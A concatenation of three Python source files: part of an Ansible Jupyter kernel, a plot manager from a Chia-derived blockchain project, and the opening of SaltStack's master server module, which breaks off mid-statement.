logger.debug('token %s', token) for arg in play_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_inspect(self, code, cursor_pos, detail_level=0): logger.debug("code %s", code) logger.debug("cursor_pos %s", cursor_pos) logger.debug("detail_level %s", detail_level) if code.strip().startswith("#inventory"): logger.info("#inentory not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} elif code.strip().startswith("#task"): return self.do_inspect_module(code, cursor_pos, detail_level) elif code.strip().startswith("#play"): logger.info("#play not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} else: return self.do_inspect_module(code, cursor_pos, detail_level) def do_inspect_module(self, code, cursor_pos, detail_level=0): data = dict() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug("code_data %s", code_data) if isinstance(code_data, str): module = code_data elif isinstance(code_data, dict): for arg in task_args: if arg in code_data: del code_data[arg] module = code_data.keys()[0] else: logger.warn('code type not supported %s', type(code_data)) return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': False} data.update(self.get_module_doc(module)) return {'status': 'ok', 'data': data, 'metadata': {}, 'found': True} def get_galaxy_role(self, role_name): command = ['ansible-galaxy', 'list', '-p', 'project/roles'] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') for line in output.splitlines(): if line.startswith('- '): role, _, version = line[2:].partition(',') role = role.strip() if role == role_name: return p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) command = ['ansible-galaxy', 'install', '-p', 'project/roles', role_name] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) def get_module_doc(self, module): data = {} logger.debug("command %s", " ".join( ['ansible-doc', '-t', 'module', module])) p = Popen(['ansible-doc', '-t', 'module', module], stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) data['text/plain'] = output return data def is_ansible_alive(self): if self.runner_thread is None: logger.info("NOT STARTED") return False if self.runner_thread.is_alive(): logger.info("YES") else: logger.info("NO") return self.runner_thread.is_alive() def cancel_callback(self): logger.info('called') return self.shutdown_requested def finished_callback(self, runner): logger.info('called') self.shutdown = True if not self.shutdown_requested: self.queue.put(StatusMessage(['PlaybookEnded', {}])) def do_shutdown(self, restart): if self.is_ansible_alive(): self.shutdown = False self.shutdown_requested = True while not self.shutdown: if not self.is_ansible_alive(): break logger.info("waiting for shutdown") time.sleep(1) logger.info("shutdown complete") self.shutdown_requested = False self.runner_thread = None self.runner = None if self.helper is not None: self.helper.stop() self.helper = None return {'status': 'ok', 'restart': restart} def _format_application_python(self, result): if 'application/x-python' in result: ret_value = result['application/x-python'] del result['application/x-python'] return ret_value return "" def _format_text_html(self, result): if 'text/html' in result: ret_value = result['text/html'] del result['text/html'] return ret_value return "" def _format_output(self, result): if 'stdout_lines' in result: return '\n'.join(result['stdout_lines']) return "" def _format_error(self, result): if 'stderr_lines' in result: return '\n'.join(result['stderr_lines']) return "" def _dump_results(self, result): r = result for key in ['_ansible_verbose_always', '_ansible_no_log', '_ansible_parsed', 'invocation']: if key in r: del r[key] if 'stdout' in r: if r['stdout']: r['stdout'] = '[see below]' if 'stdout_lines' in r: if r['stdout_lines']: r['stdout_lines'] = '[removed for clarity]' if 'stderr' in r: if r['stderr']: r['stderr'] = '[see below]' if 'stderr_lines' in r: if r['stderr_lines']: r['stderr_lines'] = '[removed for clarity]' if 'changed' in r: del r['changed'] if 'reason' in r: return r['reason'] return json.dumps(r, sort_keys=True, indent=4) def set_parent(self, ident, parent, channel): super(AnsibleKernel, self).set_parent(ident, parent) self.shell.set_parent(parent) def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s %s', len(msg), msg, args, kwargs) if len(msg) == 7: msg0, msg1, msg2, msg3, msg4, msg5, msg6 = msg logger.debug("msg0 %s", msg0) logger.debug("msg1 %s", msg1) logger.debug("msg2 %s", msg2) logger.debug("msg3 %s", pformat(json.loads(msg3))) logger.debug("msg4 %s", pformat(json.loads(msg4))) logger.debug("msg5 %s", pformat(json.loads(msg5))) logger.debug("msg6 %s", pformat(json.loads(msg6))) msg3_data = json.loads(msg3) msg6_data = json.loads(msg6) if msg0.startswith(b"comm"): _, _, comm_id = msg0.partition('-') if msg3_data['msg_type'] == 'comm_open' and msg6_data['comm_id'] == comm_id: self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("new widget %s %s", comm_id, pformat(self.widgets[comm_id])) if msg3_data['msg_type'] == 'comm_msg' and msg6_data['comm_id'] == comm_id: if msg6_data.get('data', {}).get('method') == 'update': self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("update widget %s %s", comm_id, pformat(self.widgets[comm_id])) def update_widget(self, comm_id, state): self.widgets[comm_id].update(state) self.widgets[comm_id]['widget_update_order'] = self.widget_update_order self.widget_update_order += 1 def comm_open(self, stream, ident, msg): logger.debug("comm_open: %s %s", ident, msg) self.comm_manager.comm_open(stream, ident, msg) def comm_msg(self, stream, ident, msg): logger.debug("comm_msg: %s %s", ident, msg) logger.debug("msg %s", pformat(msg)) comm_id = msg.get('content', {}).get('comm_id', {}) if comm_id in self.widgets: self.widgets[comm_id].update(msg.get('content', {}).get('data', {}).get('state', {})) logger.debug("updated widget %s %s", comm_id, self.widgets[comm_id]) self.comm_manager.comm_msg(stream, ident, msg) def comm_close(self, stream, ident, msg): logger.debug("comm_close: %s %s", ident, msg) self.comm_manager.comm_close(stream, ident, msg)
manager.py
from dataclasses import dataclass import logging import threading import time import traceback from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator from concurrent.futures.thread import ThreadPoolExecutor from blspy import G1Element from chiapos import DiskProver from taco.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size from taco.plotting.util import ( PlotInfo, PlotRefreshResult, PlotsRefreshParameter, PlotRefreshEvents, get_plot_filenames, parse_plot_info, stream_plot_info_pk, stream_plot_info_ph, ) from taco.util.ints import uint16 from taco.util.path import mkdir from taco.util.streamable import Streamable, streamable from taco.types.blockchain_format.proof_of_space import ProofOfSpace from taco.types.blockchain_format.sized_bytes import bytes32 from taco.wallet.derive_keys import master_sk_to_local_sk log = logging.getLogger(__name__) CURRENT_VERSION: uint16 = uint16(0) @dataclass(frozen=True) @streamable class CacheEntry(Streamable): pool_public_key: Optional[G1Element] pool_contract_puzzle_hash: Optional[bytes32] plot_public_key: G1Element @dataclass(frozen=True) @streamable class DiskCache(Streamable): version: uint16 data: List[Tuple[bytes32, CacheEntry]] class Cache: _changed: bool _data: Dict[bytes32, CacheEntry] def __init__(self, path: Path): self._changed = False self._data = {} self._path = path if not path.parent.exists(): mkdir(path.parent) def __len__(self): return len(self._data) def update(self, plot_id: bytes32, entry: CacheEntry): self._data[plot_id] = entry self._changed = True def remove(self, cache_keys: List[bytes32]): for key in cache_keys: if key in self._data: del self._data[key] self._changed = True def save(self): try: disk_cache: DiskCache = DiskCache( CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()] ) serialized: bytes = bytes(disk_cache) self._path.write_bytes(serialized) self._changed = False log.info(f"Saved {len(serialized)} bytes of cached data") except Exception as e: log.error(f"Failed to save cache: {e}, {traceback.format_exc()}") def load(self): try: serialized = self._path.read_bytes() log.info(f"Loaded {len(serialized)} bytes of cached data") stored_cache: DiskCache = DiskCache.from_bytes(serialized) if stored_cache.version != CURRENT_VERSION: # TODO, Migrate or drop current cache if the version changes. raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.") self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data} except FileNotFoundError: log.debug(f"Cache {self._path} not found") except Exception as e: log.error(f"Failed to load cache: {e}, {traceback.format_exc()}") def keys(self): return self._data.keys() def items(self): return self._data.items() def get(self, plot_id): return self._data.get(plot_id) def changed(self): return self._changed def path(self): return self._path class PlotManager: plots: Dict[Path, PlotInfo] plot_filename_paths: Dict[str, Tuple[str, Set[str]]] plot_filename_paths_lock: threading.Lock failed_to_open_filenames: Dict[Path, int] no_key_filenames: Set[Path] farmer_public_keys: List[G1Element] pool_public_keys: List[G1Element] cache: Cache match_str: Optional[str] show_memo: bool open_no_key_filenames: bool last_refresh_time: float refresh_parameter: PlotsRefreshParameter log: Any _lock: threading.Lock _refresh_thread: Optional[threading.Thread] _refreshing_enabled: bool _refresh_callback: Callable def __init__( self, root_path: Path, refresh_callback: Callable, match_str: Optional[str] = None, show_memo: bool = False, open_no_key_filenames: bool = False, refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(), ): self.root_path = root_path self.plots = {} self.plot_filename_paths = {} self.plot_filename_paths_lock = threading.Lock() self.failed_to_open_filenames = {} self.no_key_filenames = set() self.farmer_public_keys = [] self.pool_public_keys = [] self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat") self.match_str = match_str self.show_memo = show_memo self.open_no_key_filenames = open_no_key_filenames self.last_refresh_time = 0 self.refresh_parameter = refresh_parameter self.log = logging.getLogger(__name__) self._lock = threading.Lock() self._refresh_thread = None self._refreshing_enabled = False self._refresh_callback = refresh_callback # type: ignore def __enter__(self): self._lock.acquire() def __exit__(self, exc_type, exc_value, exc_traceback): self._lock.release() def set_refresh_callback(self, callback: Callable): self._refresh_callback = callback # type: ignore def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]): self.farmer_public_keys = farmer_public_keys self.pool_public_keys = pool_public_keys def public_keys_available(self): return len(self.farmer_public_keys) and len(self.pool_public_keys) def plot_count(self): with self: return len(self.plots) def get_duplicates(self): result = [] for plot_filename, paths_entry in self.plot_filename_paths.items(): _, duplicated_paths = paths_entry for path in duplicated_paths: result.append(Path(path) / plot_filename) return result def needs_refresh(self) -> bool: return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds) def start_refreshing(self): self._refreshing_enabled = True if self._refresh_thread is None or not self._refresh_thread.is_alive(): self.cache.load() self._refresh_thread = threading.Thread(target=self._refresh_task) self._refresh_thread.start() def stop_refreshing(self): self._refreshing_enabled = False if self._refresh_thread is not None and self._refresh_thread.is_alive(): self._refresh_thread.join() self._refresh_thread = None def trigger_refresh(self): log.debug("trigger_refresh") self.last_refresh_time = 0 def _refresh_task(self): while self._refreshing_enabled: while not self.needs_refresh() and self._refreshing_enabled: time.sleep(1) if not self._refreshing_enabled: return plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path) plot_directories: Set[Path] = set(plot_filenames.keys()) plot_paths: List[Path] = [] for paths in plot_filenames.values(): plot_paths += paths total_result: PlotRefreshResult = PlotRefreshResult() total_size = len(plot_paths) self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size)) # First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config def plot_removed(test_path: Path): return not test_path.exists() or test_path.parent not in plot_directories filenames_to_remove: List[str] = [] for plot_filename, paths_entry in self.plot_filename_paths.items(): loaded_path, duplicated_paths = paths_entry loaded_plot = Path(loaded_path) / Path(plot_filename) if plot_removed(loaded_plot): filenames_to_remove.append(plot_filename) if loaded_plot in self.plots: del self.plots[loaded_plot] total_result.removed += 1 # No need to check the duplicates here since we drop the whole entry continue paths_to_remove: List[str] = [] for path in duplicated_paths: if plot_removed(Path(path) / Path(plot_filename)): paths_to_remove.append(path) total_result.removed += 1 for path in paths_to_remove: duplicated_paths.remove(path) for filename in filenames_to_remove: del self.plot_filename_paths[filename] def batches() -> Iterator[Tuple[int, List[Path]]]: if total_size > 0: for batch_start in range(0, total_size, self.refresh_parameter.batch_size): batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size) yield total_size - batch_end, plot_paths[batch_start:batch_end] else: yield 0, [] for remaining, batch in batches(): batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories) if not self._refreshing_enabled: self.log.debug("refresh_plots: Aborted") break # Set the remaining files since `refresh_batch()` doesn't know them but we want to report it batch_result.remaining = remaining total_result.loaded += batch_result.loaded total_result.processed += batch_result.processed total_result.duration += batch_result.duration self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result) if remaining == 0: break batch_sleep = self.refresh_parameter.batch_sleep_milliseconds self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds") time.sleep(float(batch_sleep) / 1000.0) if self._refreshing_enabled: self._refresh_callback(PlotRefreshEvents.done, total_result) # Cleanup unused cache available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()]) invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids] self.cache.remove(invalid_cache_keys) self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}") if self.cache.changed(): self.cache.save() self.last_refresh_time = time.time() self.log.debug( f"_refresh_task: total_result.loaded {total_result.loaded}, " f"total_result.removed {total_result.removed}, " f"total_duration {total_result.duration:.2f} seconds" ) def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult: start_time: float = time.time() result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths)) counter_lock = threading.Lock() log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}") if self.match_str is not None: log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name') def process_file(file_path: Path) -> Optional[PlotInfo]: if not self._refreshing_enabled: return None filename_str = str(file_path) if self.match_str is not None and self.match_str not in filename_str: return None if ( file_path in self.failed_to_open_filenames and (time.time() - self.failed_to_open_filenames[file_path]) < self.refresh_parameter.retry_invalid_seconds ): # Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file return None if file_path in self.plots: return self.plots[file_path] entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name) if entry is not None: loaded_parent, duplicates = entry if str(file_path.parent) in duplicates: log.debug(f"Skip duplicated plot {str(file_path)}") return None try: if not file_path.exists(): return None prover = DiskProver(str(file_path)) log.debug(f"process_file {str(file_path)}") expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR stat_info = file_path.stat() # TODO: consider checking if the file was just written to (which would mean that the file is still # being copied). A segfault might happen in this edge case. if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size: log.warning( f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected" f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied." ) return None cache_entry = self.cache.get(prover.get_id()) if cache_entry is None: ( pool_public_key_or_puzzle_hash, farmer_public_key, local_master_sk, ) = parse_plot_info(prover.get_memo()) # Only use plots that correct keys associated with them if farmer_public_key not in self.farmer_public_keys: log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.") self.no_key_filenames.add(file_path) if not self.open_no_key_filenames: return None pool_public_key: Optional[G1Element] = None pool_contract_puzzle_hash: Optional[bytes32] = None if isinstance(pool_public_key_or_puzzle_hash, G1Element): pool_public_key = pool_public_key_or_puzzle_hash else: assert isinstance(pool_public_key_or_puzzle_hash, bytes32) pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash if pool_public_key is not None and pool_public_key not in self.pool_public_keys: log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.") self.no_key_filenames.add(file_path) if not self.open_no_key_filenames: return None local_sk = master_sk_to_local_sk(local_master_sk) plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key( local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None ) cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key) self.cache.update(prover.get_id(), cache_entry) with self.plot_filename_paths_lock: paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name) if paths is None: paths = (str(Path(prover.get_filename()).parent), set()) self.plot_filename_paths[file_path.name] = paths else: paths[1].add(str(Path(prover.get_filename()).parent)) log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.") return None new_plot_info: PlotInfo = PlotInfo( prover, cache_entry.pool_public_key, cache_entry.pool_contract_puzzle_hash, cache_entry.plot_public_key, stat_info.st_size, stat_info.st_mtime, ) with counter_lock: result.loaded += 1 if file_path in self.failed_to_open_filenames: del self.failed_to_open_filenames[file_path] except Exception as e: tb = traceback.format_exc() log.error(f"Failed to open file {file_path}. {e} {tb}") self.failed_to_open_filenames[file_path] = int(time.time()) return None log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}") if self.show_memo: plot_memo: bytes32 if pool_contract_puzzle_hash is None: plot_memo = stream_plot_info_pk(pool_public_key, farmer_public_key, local_master_sk) else: plot_memo = stream_plot_info_ph(pool_contract_puzzle_hash, farmer_public_key, local_master_sk) plot_memo_str: str = plot_memo.hex() log.info(f"Memo: {plot_memo_str}") return new_plot_info with self, ThreadPoolExecutor() as executor: plots_refreshed: Dict[Path, PlotInfo] = {} for new_plot in executor.map(process_file, plot_paths): if new_plot is not None: plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot self.plots.update(plots_refreshed) result.duration = time.time() - start_time self.log.debug( f"refresh_batch: loaded {result.loaded}, " f"removed {result.removed}, processed {result.processed}, " f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, " f"duration: {result.duration:.2f} seconds" ) return result
master.py
# -*- coding: utf-8 -*- ''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python libs from __future__ import absolute_import, with_statement, print_function, unicode_literals import copy import ctypes import functools import os import re import sys import time import signal import stat import logging import collections import multiprocessing import threading import salt.serializers.msgpack # pylint: disable=import-error,no-name-in-module,redefined-builtin from salt.ext import six from salt.ext.six.moves import range from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO # pylint: enable=import-error,no-name-in-module,redefined-builtin import salt.ext.tornado.gen # pylint: disable=F0401 # Import salt libs import salt.crypt import salt.cli.batch_async import salt.client import salt.client.ssh.client import salt.exceptions import salt.payload import salt.pillar import salt.state import salt.runner import salt.auth import salt.wheel import salt.minion import salt.key import salt.acl import salt.engines import salt.daemons.masterapi import salt.defaults.exitcodes import salt.transport.server import salt.log.setup import salt.utils.args import salt.utils.atomicfile import salt.utils.crypt import salt.utils.event import salt.utils.files import salt.utils.gitfs import salt.utils.gzip_util import salt.utils.jid import salt.utils.job import salt.utils.master import salt.utils.minions import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.stringutils import salt.utils.user import salt.utils.verify import salt.utils.zeromq from salt.config import DEFAULT_INTERVAL from salt.defaults import DEFAULT_TARGET_DELIM from salt.transport import iter_transport_opts from salt.utils.debug import ( enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack ) from salt.utils.event import tagify from salt.utils.odict import OrderedDict try: import resource HAS_RESOURCE = True except ImportError: # resource is not available on windows HAS_RESOURCE = False # Import halite libs try: import halite # pylint: disable=import-error HAS_HALITE = True except ImportError: HAS_HALITE = False from salt.ext.tornado.stack_context import StackContext from salt.utils.ctx import RequestContext log = logging.getLogger(__name__) class SMaster(object): ''' Create a simple salt-master, this will generate the top-level master ''' secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION} def __init__(self, opts): ''' Create a salt master server instance :param dict opts: The salt options dictionary ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. def __setstate__(self, state): self.opts = state['opts'] self.master_key = state['master_key'] self.key = state['key'] SMaster.secrets = state['secrets'] def __getstate__(self): return {'opts': self.opts, 'master_key': self.master_key, 'key': self.key, 'secrets': SMaster.secrets} def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. ''' return salt.daemons.masterapi.access_keys(self.opts) class Maintenance(salt.utils.process.SignalHandlingProcess): ''' A generalized maintenance process which performs maintenance routines. ''' def __init__(self, opts, **kwargs): ''' Create a maintenance instance :param dict opts: The salt options ''' super(Maintenance, self).__init__(**kwargs) self.opts = opts # How often do we perform the maintenance tasks self.loop_interval = int(self.opts['loop_interval']) # Track key rotation intervals self.rotate = int(time.time()) # A serializer for general maint operations self.serial = salt.payload.Serial(self.opts) # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['opts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'] ) def __getstate__(self): return { 'opts': self.opts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _post_fork_init(self): ''' Some things need to be init'd after the fork has completed The easiest example is that one of these module types creates a thread in the parent process, then once the fork happens you'll start getting errors like "WARNING: Mixing fork() and threads detected; memory leaked." ''' # Load Runners ropts = dict(self.opts) ropts['quiet'] = True runner_client = salt.runner.RunnerClient(ropts) # Load Returners self.returners = salt.loader.returners(self.opts, {}) # Init Scheduler self.schedule = salt.utils.schedule.Schedule(self.opts, runner_client.functions_dict(), returners=self.returners) self.ckminions = salt.utils.minions.CkMinions(self.opts) # Make Event bus for firing self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Init any values needed by the git ext pillar self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts) self.presence_events = False if self.opts.get('presence_events', False): tcp_only = True for transport, _ in iter_transport_opts(self.opts): if transport != 'tcp': tcp_only = False if not tcp_only: # For a TCP only transport, the presence events will be # handled in the transport code. self.presence_events = True def run(self): ''' This is the general passive maintenance process controller for the Salt master. This is where any data that needs to be cleanly maintained from the master is maintained. ''' salt.utils.process.appendproctitle(self.__class__.__name__) # init things that need to be done after the process is forked self._post_fork_init() # Make Start Times last = int(time.time()) last_git_pillar_update = last git_pillar_update_interval = self.opts.get('git_pillar_update_interval', 0) old_present = set() while True: now = int(time.time()) if (now - last) >= self.loop_interval: salt.daemons.masterapi.clean_old_jobs(self.opts) salt.daemons.masterapi.clean_expired_tokens(self.opts) salt.daemons.masterapi.clean_pub_auth(self.opts) if (now - last_git_pillar_update) >= git_pillar_update_interval: last_git_pillar_update = now self.handle_git_pillar() self.handle_schedule() self.handle_key_cache() self.handle_presence(old_present) self.handle_key_rotate(now) salt.utils.verify.check_max_open_files(self.opts) last = now time.sleep(self.loop_interval) def handle_key_cache(self): ''' Evaluate accepted keys and create a msgpack file which contains a list ''' if self.opts['key_cache'] == 'sched': keys = [] #TODO DRY from CKMinions if self.opts['transport'] in ('zeromq', 'tcp'): acc = 'minions' else: acc = 'accepted' for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)): if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)): keys.append(fn_) log.debug('Writing master key cache') # Write a temporary file securely if six.PY2: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file: self.serial.dump(keys, cache_file) else: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache'), mode='wb') as cache_file: self.serial.dump(keys, cache_file) def handle_key_rotate(self, now): ''' Rotate the AES key rotation ''' to_rotate = False dfn = os.path.join(self.opts['cachedir'], '.dfn') try: stats = os.stat(dfn) # Basic Windows permissions don't distinguish between # user/group/all. Check for read-only state instead. if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): to_rotate = True # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) elif stats.st_mode == 0o100400: to_rotate = True else: log.error('Found dropfile with incorrect permissions, ignoring...') os.remove(dfn) except os.error: pass if self.opts.get('publish_session'): if now - self.rotate >= self.opts['publish_session']: to_rotate = True if to_rotate: log.info('Rotating master AES key') for secret_key, secret_map in six.iteritems(SMaster.secrets): # should be unnecessary-- since no one else should be modifying with secret_map['secret'].get_lock(): secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']()) self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key') self.rotate = now if self.opts.get('ping_on_rotate'): # Ping all minions to get them to pick up the new key log.debug('Pinging all connected minions ' 'due to key rotation') salt.utils.master.ping_all_connected_minions(self.opts) def handle_git_pillar(self): ''' Update git pillar ''' try: for pillar in self.git_pillar: pillar.fetch_remotes() except Exception as exc: # pylint: disable=broad-except log.error('Exception caught while updating git_pillar', exc_info=True) def handle_schedule(self): ''' Evaluate the scheduler ''' try: self.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if self.schedule.loop_interval < self.loop_interval: self.loop_interval = self.schedule.loop_interval except Exception as exc: # pylint: disable=broad-except log.error('Exception %s occurred in scheduled job', exc) self.schedule.cleanup_subprocesses() def handle_presence(self, old_present): ''' Fire presence events if enabled ''' # On the first run it may need more time for the EventPublisher # to come up and be ready. Set the timeout to account for this. if self.presence_events and self.event.connect_pull(timeout=3): present = self.ckminions.connected_ids() new = present.difference(old_present) lost = old_present.difference(present) if new or lost: # Fire new minions present event data = {'new': list(new), 'lost': list(lost)} self.event.fire_event(data, tagify('change', 'presence')) data = {'present': list(present)} self.event.fire_event(data, tagify('present', 'presence')) old_present.clear() old_present.update(present) class FileserverUpdate(salt.utils.process.SignalHandlingProcess): ''' A process from which to update any dynamic fileserver backends ''' def __init__(self, opts, **kwargs): super(FileserverUpdate, self).__init__(**kwargs) self.opts = opts self.update_threads = {} # Avoid circular import import salt.fileserver self.fileserver = salt.fileserver.Fileserver(self.opts) self.fill_buckets() # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self.__init__( state['opts'], log_queue=state['log_queue'], ) def __getstate__(self): return {'opts': self.opts, 'log_queue': self.log_queue, } def fill_buckets(self): ''' Get the configured backends and the intervals for any backend which supports them, and set up the update "buckets". There will be one bucket for each thing being updated at a given interval. ''' update_intervals = self.fileserver.update_intervals() self.buckets = {} for backend in self.fileserver.backends(): fstr = '{0}.update'.format(backend) try: update_func = self.fileserver.servers[fstr] except KeyError: log.debug( 'No update function for the %s filserver backend', backend ) continue if backend in update_intervals: # Variable intervals are supported for this backend for id_, interval in six.iteritems(update_intervals[backend]): if not interval: # Don't allow an interval of 0 interval = DEFAULT_INTERVAL log.debug( 'An update_interval of 0 is not supported, ' 'falling back to %s', interval ) i_ptr = self.buckets.setdefault(interval, OrderedDict()) # Backend doesn't technically need to be present in the # key, all we *really* need is the function reference, but # having it there makes it easier to provide meaningful # debug logging in the update threads. i_ptr.setdefault((backend, update_func), []).append(id_) else: # Variable intervals are not supported for this backend, so # fall back to the global interval for that fileserver. Since # this backend doesn't support variable updates, we have # nothing to pass to the backend's update func, so we'll just # set the value to None. try: interval_key = '{0}_update_interval'.format(backend) interval = self.opts[interval_key] except KeyError: interval = DEFAULT_INTERVAL log.warning( '%s key missing from configuration. Falling back to ' 'default interval of %d seconds', interval_key, interval ) self.buckets.setdefault( interval, OrderedDict())[(backend, update_func)] = None def update_fileserver(self, interval, backends): ''' Threading target which handles all updates for a given wait interval ''' def _do_update(): log.debug( 'Performing fileserver updates for items with an update ' 'interval of %d', interval ) for backend, update_args in six.iteritems(backends): backend_name, update_func = backend try: if update_args: log.debug( 'Updating %s fileserver cache for the following ' 'targets: %s', backend_name, update_args ) args = (update_args,) else: log.debug('Updating %s fileserver cache', backend_name) args = () update_func(*args) except Exception as exc: # pylint: disable=broad-except log.exception( 'Uncaught exception while updating %s fileserver ' 'cache', backend_name ) log.debug( 'Completed fileserver updates for items with an update ' 'interval of %d, waiting %d seconds', interval, interval ) condition = threading.Condition() _do_update() while True: with condition: condition.wait(interval) _do_update() def run(self): ''' Start the update threads ''' salt.utils.process.appendproctitle(self.__class__.__name__) # Clean out the fileserver backend cache salt.daemons.masterapi.clean_fsbackend(self.opts) for interval in self.buckets: self.update_threads[interval] = threading.Thread( target=self.update_fileserver, args=(interval, self.buckets[interval]), ) self.update_threads[interval].start() # Keep the process alive while True: time.sleep(60) class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance :param dict: The salt options ''' if zmq and ZMQ_VERSION_INFO < (3, 2): log.warning( 'You have a version of ZMQ less than ZMQ 3.2! There are ' 'known connection keep-alive issues with ZMQ < 3.2 which ' 'may result in loss of contact with minions. Please ' 'upgrade your ZMQ!' ) SMaster.__init__(self, opts) def __set_max_open_files(self): if not HAS_RESOURCE: return # Let's check to see how our max open files(ulimit -n) setting is mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE) if mof_h == resource.RLIM_INFINITY: # Unclear what to do with infinity... macOS reports RLIM_INFINITY as # hard limit,but raising to anything above soft limit fails... mof_h = mof_s log.info( 'Current values for max open files soft/hard setting: %s/%s', mof_s, mof_h ) # Let's grab, from the configuration file, the value to raise max open # files to mof_c = self.opts['max_open_files'] if mof_c > mof_h: # The configured value is higher than what's allowed log.info( 'The value for the \'max_open_files\' setting, %s, is higher ' 'than the highest value the user running salt is allowed to ' 'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h ) mof_c = 